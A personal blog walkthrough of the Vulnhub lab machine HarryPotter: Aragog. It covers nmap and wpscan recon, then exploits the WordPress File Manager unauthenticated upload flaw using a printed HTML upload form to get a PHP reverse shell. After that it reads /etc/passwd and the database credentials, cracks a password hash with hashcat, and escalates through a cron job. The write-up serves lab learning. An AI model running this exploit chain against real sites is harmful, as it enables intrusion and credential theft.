HARRYPOTTER: ARAGOG | Vulnhub Walkthrough

Rahul
5 min readMay 6, 2021

--

Let’s do another cool machine of Vulnhub from @Mansoor R

Aragog is the 1st VM of 3-box HarryPotter.

Goal : find 2 horcruxes hidden inside the machine

Lab Setup:-

Download this machine from the link and import it into the virtual box.

Let’s start with reconnaissance.

Here is the machine welcome message and the ip.

In my case IP is 192.168.1.101

Let’s start a quick scan.

┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds

In the simple scan got multiple open ports.

Here is the complete Nmap scan report

┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S

In port 80 got Harry Potter image.

So i run the gobuster for directory scanning and got one blog directory

And in the /blog wordpress is running.

So i move towards to scan wordpress.

┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive

After running wpscan got only 2 plugins in which one is default, So i move forward with the another plugin.

And i got this thing.

Plugin is vulnerable to File Manager 6.0–6.9 — Unauthenticated Arbitrary File Upload leading to RCE.

https://www.exploit-db.com/exploits/49178

https://wpscan.com/vulnerability/10389

So i created a simple HTML page and upload a payload from that file.

<html><body><form method="POST" enctype="multipart/form-data" action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"><input type="hidden" name="cmd" value="upload"/><input type="hidden" name="target" value="l1_Lw"/><input type="file" name="upload[]"/><br/><br/><input type="submit" value="Upload"/></form></body>
File : /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php

Now after calling it via browser got a reverse shell

Now next part is to check the user.

I found 2 user entry in /etc/passwd

gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash

Becuase Wordpress is running so i move forward to find the database credentials.

After enumerating got wordpress credentials file.

<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>

In the databse got one hash

hagrid98:$P$BY**************JDHtc.

So i used hashcat to crack the hash

┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt

So i got the password of ha****98

Got the first bash64 encrypted flag.

horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}

Privilege escalation is little bit tricky.

After searching got nothing so i move towards to monitor the running cron jobs.

I used pspy to monitor running cron job.

After monitoring some commands got someting intrestings so i payed attention on it.

So i added a reverse shell command on it and start a listner on other side.

Once the file executed then will get shell.

Now i Got the Second bash64 encrypted flag.

horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}

Hurray !!!

All is fine but the Privilege escalation part is little bit challenging,

All you need to do is keep focusing on the running services and monitor each of them.

--

--

No responses yet